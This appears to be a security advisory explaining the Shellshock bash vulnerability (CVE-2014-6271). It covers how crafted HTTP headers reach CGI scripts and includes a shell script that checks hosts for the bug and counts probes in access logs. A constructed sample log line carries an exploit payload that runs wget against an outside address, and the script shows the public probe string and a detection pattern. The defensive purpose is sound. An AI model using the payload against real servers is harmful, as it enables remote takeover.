Floragasse 7 – 5th floor, 1040 Vienna

Shellshock a.k.a. Bashbleed

What is Shellshock?

On 24/09/2014, a security vulnerability was published as CVE-2014-6271 (also known as Shellshock or Bashbleed). The vulnerability is in bash, the command line shell that is used as the default shell on practically all Linux systems. Bash imports environment variables whose value begins with "() {" as function definitions, and because of an error in this parsing it also executes any commands that follow the function body. Anyone who can place a crafted value into the environment of a bash process can therefore execute arbitrary commands with the rights of that process. Under certain circumstances the vulnerability can be exploited by an external attacker over the network.

Update 29/09/2014: The vulnerability is already being exploited in automated attacks, as observed on honeypot systems.

Impact

The danger is that bash is used implicitly in many places, so that attack opportunities over the Internet exist. The most obvious are attacks on web servers that offer CGI scripts. When a CGI script is run, the web server passes request data such as HTTP headers to the script as environment variables (for example the User-Agent header becomes HTTP_USER_AGENT). If the script is a bash script or invokes bash, an attacker can place a crafted header in an ordinary HTTP request and, under certain circumstances, execute their own commands on the vulnerable web server with the privileges of the web server process, and thus take over the server!
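The following script is an added example and is not code from SBA Research or from the original post. It illustrates both points above: the first function runs the widely circulated public probe string through a fresh bash process to show whether the parser bug is present, the second runs the same probe under the variable name a CGI web server would use for the User-Agent header, and the third counts probe attempts in web server access-log lines. The marker text "Vulnerable-Marker", the function names, and the four log lines (with addresses from documentation ranges) are assumptions constructed for this example.

```shell
#!/bin/sh
# Added example, not part of the original SBA Research post.

# The public probe string: an environment variable whose value starts with
# "() {" is imported by bash as a function definition. An unpatched bash kept
# executing whatever followed the closing brace, so "echo Vulnerable-Marker"
# ran before the command the child was actually asked to run.
# "Vulnerable-Marker" is our own marker text (assumption).
PROBE='() { :;}; echo Vulnerable-Marker'

# Expose the probe to a freshly started bash under the given variable name
# ($1, default "x") and run a harmless command. Prints "vulnerable",
# "patched", or "bash-missing".
shellshock_status() {
    name=${1:-x}
    if ! command -v bash >/dev/null 2>&1; then
        echo bash-missing
        return 0
    fi
    # env sets the variable only for the child process; bash -c then runs a
    # benign command. Only the parser bug can put the marker on stdout.
    # A patched bash may warn on stderr, which is discarded here.
    out=$(env "$name=$PROBE" bash -c 'echo this is a test' 2>/dev/null)
    case "$out" in
        *Vulnerable-Marker*) echo vulnerable ;;
        *)                   echo patched ;;
    esac
}

# The CGI vector is the same test under the name a web server uses: CGI
# passes the User-Agent header as HTTP_USER_AGENT (and every other header as
# HTTP_<NAME>), so a bash-based CGI script sees the attacker's header value
# in its environment as soon as it starts.
cgi_header_status() {
    shellshock_status HTTP_USER_AGENT
}

# Detection: count access-log lines (on stdin) whose request, referer or
# user-agent field carries the "() {" function-definition prefix. Every
# exploit attempt must begin the value this way, so the fixed substring is a
# cheap first-pass indicator. It also matches scanners run by researchers,
# which is still worth knowing about.
count_shellshock_probes() {
    grep -cF '() {'
}

# Constructed sample log lines (not real traffic); addresses are from the
# RFC 5737 documentation ranges. Lines 1 and 3 carry probes, in the
# user-agent and referer fields respectively.
SAMPLE_LOG='203.0.113.7 - - [25/Sep/2014:10:12:01 +0200] "GET /cgi-bin/status.sh HTTP/1.1" 200 312 "-" "() { :;}; /bin/bash -c \"wget http://198.51.100.9/x\""
198.51.100.23 - - [25/Sep/2014:10:12:05 +0200] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Sep/2014:10:12:09 +0200] "GET /cgi-bin/status.sh HTTP/1.1" 200 312 "() { :;}; echo probe" "Mozilla/5.0"
192.0.2.44 - - [25/Sep/2014:10:13:00 +0200] "GET /cgi-bin/status.sh HTTP/1.1" 200 312 "-" "curl/7.37.0"'

# Run the detector over the constructed sample; expected result is 2.
sample_probe_count() {
    printf '%s\n' "$SAMPLE_LOG" | count_shellshock_probes
}

echo "direct bash test:          $(shellshock_status)"
echo "CGI User-Agent test:       $(cgi_header_status)"
echo "probe lines in sample log: $(sample_probe_count)"
```

On a patched system both status checks print "patched" and the sample count is 2. Run the first two checks on every host where bash is installed, not only on web servers: any service that hands attacker-controlled data to bash through the environment (CGI, DHCP clients, SSH forced commands) is exposed in the same way. The log check is a starting point for incident response after the fact; it tells you that a probe arrived, not whether it succeeded, so follow up on the host itself.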

More information about checks and remediation can be found here.

Contact

For more information or assistance with checks please contact: bashbleed@sba-research.org